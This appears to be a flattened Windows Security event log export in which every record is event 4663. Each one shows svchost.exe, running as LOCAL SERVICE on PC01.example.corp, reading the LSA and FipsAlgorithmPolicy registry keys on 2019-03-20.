0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + 